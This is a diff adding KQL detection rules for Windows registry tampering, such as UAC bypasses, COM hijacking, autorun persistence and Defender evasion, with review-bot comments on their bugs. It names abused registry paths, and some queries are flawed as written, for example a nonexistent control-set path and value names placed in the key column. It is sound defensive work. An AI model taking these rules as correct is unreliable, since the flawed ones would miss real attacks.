+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate administration via scripts or tools (e.g., SCCM, Intune, GPO enforcement). Correlate with administrative activity.
+// - Software installations that legitimately modify Defender settings (less common for these specific keys).
+
+DeviceRegistryEvents
+| where (RegistryValueData in~ ("DWORD (0x00000006)", "DWORD (0x00000009)")) and RegistryKey endswith "\\Microsoft\\Windows Defender\\Threats\\ThreatSeverityDefaultAction*" and (RegistryKey endswith "\\1" or RegistryKey endswith "\\2" or RegistryKey endswith "\\4" or RegistryKey endswith "\\5")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/windows_registry_trust_record_modification.kql b/KQL/rules/windows/registry/registry_event/windows_registry_trust_record_modification.kql
new file mode 100644
index 00000000..5e5f7158
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/windows_registry_trust_record_modification.kql
@@ -0,0 +1,12 @@
+// Title: Windows Registry Trust Record Modification
+// Author: Antonlovesdnb, Trent Liffick (@tliffick)
+// Date: 2020-02-19
+// Level: medium
+// Description: Alerts on trust record modification within the registry, indicating usage of macros
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+// False Positives:
+// - This will alert on legitimate macro usage as well, additional tuning is required
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Security\\Trusted Documents\\TrustRecords"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/winekey_registry_modification.kql b/KQL/rules/windows/registry/registry_event/winekey_registry_modification.kql
new file mode 100644
index 00000000..dce118d6
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/winekey_registry_modification.kql
@@ -0,0 +1,10 @@
+// Title: WINEKEY Registry Modification
+// Author: omkar72
+// Date: 2020-10-30
+// Level: high
+// Description: Detects potential malicious modification of run keys by winekey or team9 backdoor
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547
+
+DeviceRegistryEvents
+| where RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Backup Mgr"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/activate_suppression_of_windows_security_center_notifications.kql b/KQL/rules/windows/registry/registry_set/activate_suppression_of_windows_security_center_notifications.kql
new file mode 100644
index 00000000..8d091e01
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/activate_suppression_of_windows_security_center_notifications.kql
@@ -0,0 +1,10 @@
+// Title: Activate Suppression of Windows Security Center Notifications
+// Author: frack113
+// Date: 2022-08-19
+// Level: medium
+// Description: Detect set Notification_Suppress to 1 to disable the Windows security center notification
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\UX Configuration\\Notification_Suppress"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/add_debugger_entry_to_aedebug_for_persistence.kql b/KQL/rules/windows/registry/registry_set/add_debugger_entry_to_aedebug_for_persistence.kql
new file mode 100644
index 00000000..fcc2126a
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/add_debugger_entry_to_aedebug_for_persistence.kql
@@ -0,0 +1,12 @@
+// Title: Add Debugger Entry To AeDebug For Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: medium
+// Description: Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Legitimate use of the key to setup a debugger. Which is often the case on developers machines
+
+DeviceRegistryEvents
+| where (RegistryValueData endswith ".dll" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AeDebug\\Debugger") and (not(RegistryValueData =~ "\"C:\\WINDOWS\\system32\\vsjitdebugger.exe\" -p %ld -e %ld -j 0x%p"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/add_debugger_entry_to_hangs_key_for_persistence.kql b/KQL/rules/windows/registry/registry_set/add_debugger_entry_to_hangs_key_for_persistence.kql
new file mode 100644
index 00000000..0dfded9b
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/add_debugger_entry_to_hangs_key_for_persistence.kql
@@ -0,0 +1,12 @@
+// Title: Add Debugger Entry To Hangs Key For Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - This value is not set by default but could be rarly used by administrators
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\Debugger"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/add_disallowrun_execution_to_registry.kql b/KQL/rules/windows/registry/registry_set/add_disallowrun_execution_to_registry.kql
new file mode 100644
index 00000000..407fa6ed
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/add_disallowrun_execution_to_registry.kql
@@ -0,0 +1,10 @@
+// Title: Add DisallowRun Execution to Registry
+// Author: frack113
+// Date: 2022-08-19
+// Level: medium
+// Description: Detect set DisallowRun to 1 to prevent user running specific computer program
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/add_port_monitor_persistence_in_registry.kql b/KQL/rules/windows/registry/registry_set/add_port_monitor_persistence_in_registry.kql
new file mode 100644
index 00000000..f670f907
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/add_port_monitor_persistence_in_registry.kql
@@ -0,0 +1,11 @@
+// Title: Add Port Monitor Persistence in Registry
+// Author: frack113
+// Date: 2021-12-30
+// Level: medium
+// Description: Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.
+// A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010
+
+DeviceRegistryEvents
+| where (RegistryValueData endswith ".dll" and RegistryKey endswith "\\Control\\Print\\Monitors*") and (not(((RegistryValueData =~ "cpwmon64_v40.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "\\Control\\Print\\Monitors\\CutePDF Writer Monitor v4.0\\Driver" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or RegistryKey contains "\\Control\\Print\\Monitors\\MONVNC\\Driver" or (RegistryKey endswith "Control\\Print\\Environments*" and RegistryKey endswith "\\Drivers*" and RegistryKey contains "\\VNC Printer"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/allow_rdp_remote_assistance_feature.kql b/KQL/rules/windows/registry/registry_set/allow_rdp_remote_assistance_feature.kql
new file mode 100644
index 00000000..42f5a68d
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/allow_rdp_remote_assistance_feature.kql
@@ -0,0 +1,12 @@
+// Title: Allow RDP Remote Assistance Feature
+// Author: frack113
+// Date: 2022-08-19
+// Level: medium
+// Description: Detect enable rdp feature to allow specific user to rdp connect on the targeted machine
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate use of the feature (alerts should be investigated either way)
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "System\\CurrentControlSet\\Control\\Terminal Server\\fAllowToGetHelp"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql b/KQL/rules/windows/registry/registry_set/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql
new file mode 100644
index 00000000..7489d25a
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql
@@ -0,0 +1,12 @@
+// Title: Antivirus Filter Driver Disallowed On Dev Drive - Registry
+// Author: @kostastsale, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-11-05
+// Level: high
+// Description: Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\FilterManager\\FltmgrDevDriveAllowAntivirusFilter"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/bypass_uac_using_delegateexecute.kql b/KQL/rules/windows/registry/registry_set/bypass_uac_using_delegateexecute.kql
new file mode 100644
index 00000000..a5785617
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/bypass_uac_using_delegateexecute.kql
@@ -0,0 +1,10 @@
+// Title: Bypass UAC Using DelegateExecute
+// Author: frack113
+// Date: 2022-01-05
+// Level: high
+// Description: Bypasses User Account Control using a fileless method
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "(Empty)" and RegistryKey endswith "\\open\\command\\DelegateExecute"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/bypass_uac_using_event_viewer.kql b/KQL/rules/windows/registry/registry_set/bypass_uac_using_event_viewer.kql
new file mode 100644
index 00000000..e724e999
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/bypass_uac_using_event_viewer.kql
@@ -0,0 +1,10 @@
+// Title: Bypass UAC Using Event Viewer
+// Author: frack113
+// Date: 2022-01-05
+// Level: high
+// Description: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010
+
+DeviceRegistryEvents
+| where RegistryKey endswith "_Classes\\mscfile\\shell\\open\\command\\(Default)" and (not(RegistryValueData startswith "%SystemRoot%\\system32\\mmc.exe \"%1\" %"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/bypass_uac_using_silentcleanup_task.kql b/KQL/rules/windows/registry/registry_set/bypass_uac_using_silentcleanup_task.kql
new file mode 100644
index 00000000..695c79b7
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/bypass_uac_using_silentcleanup_task.kql
@@ -0,0 +1,12 @@
+// Title: Bypass UAC Using SilentCleanup Task
+// Author: frack113, Nextron Systems
+// Date: 2022-01-06
+// Level: high
+// Description: Detects the setting of the environement variable "windir" to a non default value.
+// Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task.
+// The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Environment\\windir" and (not(RegistryValueData =~ "%SystemRoot%"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/change_the_fax_dll.kql b/KQL/rules/windows/registry/registry_set/change_the_fax_dll.kql
new file mode 100644
index 00000000..5ad43122
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/change_the_fax_dll.kql
@@ -0,0 +1,10 @@
+// Title: Change the Fax Dll
+// Author: frack113
+// Date: 2022-07-17
+// Level: high
+// Description: Detect possible persistence using Fax DLL load when service restart
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Software\\Microsoft\\Fax\\Device Providers*" and RegistryKey contains "\\ImageName") and (not(RegistryValueData =~ "%systemroot%\\system32\\fxst30.dll"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/change_user_account_associated_with_the_fax_service.kql b/KQL/rules/windows/registry/registry_set/change_user_account_associated_with_the_fax_service.kql
new file mode 100644
index 00000000..cd03cc49
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/change_user_account_associated_with_the_fax_service.kql
@@ -0,0 +1,10 @@
+// Title: Change User Account Associated with the FAX Service
+// Author: frack113
+// Date: 2022-07-17
+// Level: high
+// Description: Detect change of the user account associated with the FAX service to avoid the escalation problem.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\Fax\\ObjectName" and (not(RegistryValueData contains "NetworkService"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/change_winevt_channel_access_permission_via_registry.kql b/KQL/rules/windows/registry/registry_set/change_winevt_channel_access_permission_via_registry.kql
new file mode 100644
index 00000000..ddc96723
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/change_winevt_channel_access_permission_via_registry.kql
@@ -0,0 +1,10 @@
+// Title: Change Winevt Channel Access Permission Via Registry
+// Author: frack113
+// Date: 2022-09-17
+// Level: high
+// Description: Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+
+DeviceRegistryEvents
+| where ((RegistryValueData contains "(A;;0x1;;;LA)" or RegistryValueData contains "(A;;0x1;;;SY)" or RegistryValueData contains "(A;;0x5;;;BA)") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels*" and RegistryKey endswith "\\ChannelAccess") and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe")))
\ No newline at end of file
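Review bot: `RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\Fax\\ObjectName"` is an exact match against a path that does not exist on Windows — the control set is addressed as `CurrentControlSet` or `ControlSet001`, never `CurrentControlSet001` — so the Change User Account Associated with the FAX Service rule cannot fire. If the string is taken verbatim from the upstream Sigma rule it should be reported there as well; for the generated KQL, `| where RegistryKey endswith "\\Services\\Fax\\ObjectName" and (not(RegistryValueData contains "NetworkService"))` covers both control-set spellings and is consistent with how the other rules in this diff anchor on the key suffix. This rule also hard-codes the hive prefix, unlike most of its neighbours, so it is a good test case for whatever prefix normalisation the converter settles on.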
diff --git a/KQL/rules/windows/registry/registry_set/classes_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/classes_autorun_keys_modification.kql
new file mode 100644
index 00000000..f4f97bdf
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/classes_autorun_keys_modification.kql
@@ -0,0 +1,13 @@ +// Title: Classes Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where (RegistryKey contains "\\Software\\Classes" and (RegistryKey contains "\\Folder\\ShellEx\\ExtShellFolderViews" or RegistryKey contains "\\Folder\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\Folder\\Shellex\\ColumnHandlers" or RegistryKey contains "\\Filter" or RegistryKey contains "\\Exefile\\Shell\\Open\\Command\\(Default)" or RegistryKey contains "\\Directory\\Shellex\\DragDropHandlers" or RegistryKey contains "\\Directory\\Shellex\\CopyHookHandlers" or RegistryKey contains "\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance" or RegistryKey contains "\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance" or RegistryKey contains "\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance" or RegistryKey contains "\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance" or RegistryKey contains "\\Classes\\AllFileSystemObjects\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\.exe" or RegistryKey contains "\\.cmd" or RegistryKey contains "\\ShellEx\\PropertySheetHandlers" or RegistryKey contains "\\ShellEx\\ContextMenuHandlers")) and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\drvinst.exe" or RegistryValueData =~ "(Empty)" or isnull(RegistryValueData) or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" and RegistryKey endswith 
"\\lnkfile\\shellex\\ContextMenuHandlers*")))) and (not(RegistryValueData =~ "{807583E5-5146-11D5-A672-00B0D022E945}")) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/clickonce_trust_prompt_tampering.kql b/KQL/rules/windows/registry/registry_set/clickonce_trust_prompt_tampering.kql new file mode 100644 index 00000000..e2d1d762 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/clickonce_trust_prompt_tampering.kql @@ -0,0 +1,12 @@ +// Title: ClickOnce Trust Prompt Tampering +// Author: @SerkinValery, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-12 +// Level: medium +// Description: Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate internal requirements. + +DeviceRegistryEvents +| where RegistryValueData =~ "Enabled" and RegistryKey endswith "\\SOFTWARE\\MICROSOFT\\.NETFramework\\Security\\TrustManager\\PromptingLevel*" and (RegistryKey endswith "\\Internet" or RegistryKey endswith "\\LocalIntranet" or RegistryKey endswith "\\MyComputer" or RegistryKey endswith "\\TrustedSites" or RegistryKey endswith "\\UntrustedSites") \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/com_hijack_via_sdclt.kql b/KQL/rules/windows/registry/registry_set/com_hijack_via_sdclt.kql new file mode 100644 index 00000000..548e999a --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/com_hijack_via_sdclt.kql 
@@ -0,0 +1,10 @@
+// Title: COM Hijack via Sdclt
+// Author: Omkar Gudhate
+// Date: 2020-09-27
+// Level: high
+// Description: Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1546, attack.t1548
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/com_hijacking_via_treatas.kql b/KQL/rules/windows/registry/registry_set/com_hijacking_via_treatas.kql
new file mode 100644
index 00000000..28e2f9a0
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/com_hijacking_via_treatas.kql
@@ -0,0 +1,12 @@
+// Title: COM Hijacking via TreatAs
+// Author: frack113
+// Date: 2022-08-28
+// Level: medium
+// Description: Detect modification of TreatAs key to enable "rundll32.exe -sta" command
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
+// False Positives:
+// - Legitimate use
+
+DeviceRegistryEvents
+| where RegistryKey endswith "TreatAs\\(Default)" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe")))
\ No newline at end of file
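Review bot: None of the `DeviceRegistryEvents` queries in this chunk narrow on `ActionType`, although every file sits under `registry_set`; assuming the target is Microsoft Defender's DeviceRegistryEvents table, key creation, deletion and rename events carry the same `RegistryKey` and will satisfy `RegistryKey contains "\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute"` just as a value write does. Inserting `| where ActionType == "RegistryValueSet"` before the existing `| where` would restore the category's meaning, and the same line is missing from every other hunk here, so it is best emitted by the converter for the whole category.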
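Review bot: `RegistryKey endswith "TreatAs\\(Default)"` on the `| where` line carries a value name (and the Sysmon spelling of the default value) inside the key path; if the intended backend is Defender's DeviceRegistryEvents, the key path and the value name are separate columns (`RegistryKey` and `RegistryValueName`, with the default value reported under an empty name), so this suffix will never appear in `RegistryKey`. A mapping closer to that schema would be `RegistryKey endswith "\\TreatAs" and isempty(RegistryValueName)`, with the existing `not(...)` filter unchanged. The same key-plus-value-name pattern is in the FAX (`\\ObjectName`), DHCP callout (`\\CalloutDlls`, `\\CalloutEnabled`), RDP port (`\\PortNumber`), DSRM (`\\DsrmAdminLogonBehavior`) and CLSID `\\InprocServer32\\(Default)` hunks, so the converter's TargetObject handling should split the last path component off into a `RegistryValueName` test.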
diff --git a/KQL/rules/windows/registry/registry_set/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql b/KQL/rules/windows/registry/registry_set/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql new file mode 100644 index 00000000..17ddb5f8 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql 
@@ -0,0 +1,12 @@ +// Title: COM Object Hijacking Via Modification Of Default System CLSID Default Value +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-07-16 +// Level: high +// Description: Detects potential COM object hijacking via modification of default system CLSID. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where ((RegistryKey endswith "\\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}*" or RegistryKey endswith "\\{2155fee3-2419-4373-b102-6843707eb41f}*" or RegistryKey endswith "\\{4590f811-1d3a-11d0-891f-00aa004b2e24}*" or RegistryKey endswith "\\{4de225bf-cf59-4cfc-85f7-68b90f185355}*" or RegistryKey endswith "\\{ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea}*" or RegistryKey endswith "\\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}*" or RegistryKey endswith "\\{F82B4EF1-93A9-4DDE-8015-F7950A1A6E31}*" or RegistryKey endswith "\\{7849596a-48ea-486e-8937-a2a3009f31a9}*" or RegistryKey endswith "\\{0b91a74b-ad7c-4a9d-b563-29eef9167172}*" or RegistryKey endswith "\\{603D3801-BD81-11d0-A3A5-00C04FD706EC}*" or RegistryKey endswith "\\{30D49246-D217-465F-B00B-AC9DDD652EB7}*" or RegistryKey endswith "\\{A7A63E5C-3877-4840-8727-C1EA9D7A4D50}*" or RegistryKey endswith "\\{2227A280-3AEA-1069-A2DE-08002B30309D}*" or RegistryKey endswith "\\{2DEA658F-54C1-4227-AF9B-260AB5FC3543}*" or RegistryKey endswith "\\{AA509086-5Ca9-4C25-8F95-589D3C07B48A}*") and (RegistryKey endswith "\\CLSID*" and (RegistryKey endswith "\\InprocServer32\\(Default)" or RegistryKey endswith "\\LocalServer32\\(Default)"))) and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains "\\AppData\\Local\\" or RegistryValueData contains "\\Desktop\\" or RegistryValueData contains "\\Downloads\\" or RegistryValueData contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or RegistryValueData contains "\\System32\\spool\\drivers\\color\\" or 
RegistryValueData contains "\\Temporary Internet" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "%appdata%" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Pictures\\"))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/common_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/common_autorun_keys_modification.kql new file mode 100644 index 00000000..e5da89bd --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/common_autorun_keys_modification.kql 
@@ -0,0 +1,13 @@ +// Title: Common Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows CE Services\\AutoStart" or RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Command Processor\\Autorun" or RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Active Setup\\Installed Components" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnDisconnect" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnConnect" or RegistryKey contains "\\SYSTEM\\Setup\\CmdLine" or RegistryKey contains "\\Software\\Microsoft\\Ctf\\LangBarAddin" or RegistryKey contains "\\Software\\Microsoft\\Command Processor\\Autorun" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components" or RegistryKey contains "\\SOFTWARE\\Classes\\Protocols\\Handler" or RegistryKey contains "\\SOFTWARE\\Classes\\Protocols\\Filter" or RegistryKey contains "\\SOFTWARE\\Classes\\Htmlfile\\Shell\\Open\\Command\\(Default)" or RegistryKey contains "\\Environment\\UserInitMprLogonScript" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\Windows\\Control Panel\\Desktop\\Scrnsave.exe" or RegistryKey contains "\\Software\\Microsoft\\Internet Explorer\\UrlSearchHooks" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Internet Explorer\\Desktop\\Components" or 
RegistryKey contains "\\Software\\Classes\\Clsid\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\Inprocserver32" or RegistryKey contains "\\Control Panel\\Desktop\\Scrnsave.exe") and (not((RegistryValueData =~ "(Empty)" or isnull(RegistryValueData) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe"))) and (not((RegistryKey contains "\\Software\\Microsoft\\Active Setup\\Installed Components\\{89820200-ECBD-11cf-8B85-00AA005B4383}" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{8A69D345-D564-463c-AFF1-A69D9E530F96}" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe")) or ((RegistryKey endswith "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Classes\\PROTOCOLS\\Handler*" or RegistryKey endswith "\\ClickToRunStore\\HKMU\\SOFTWARE\\Classes\\PROTOCOLS\\Handler*") or (RegistryValueData in~ ("{314111c7-a502-11d2-bbca-00c04f8ec294}", "{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}", "{42089D2D-912D-4018-9087-2B87803E93FB}", "{5504BE45-A83B-4808-900A-3A5C36E7F77A}", "{807583E5-5146-11D5-A672-00B0D022E945}"))) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/crashcontrol_crashdump_disabled.kql b/KQL/rules/windows/registry/registry_set/crashcontrol_crashdump_disabled.kql new file mode 100644 index 00000000..4ee20b56 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/crashcontrol_crashdump_disabled.kql 
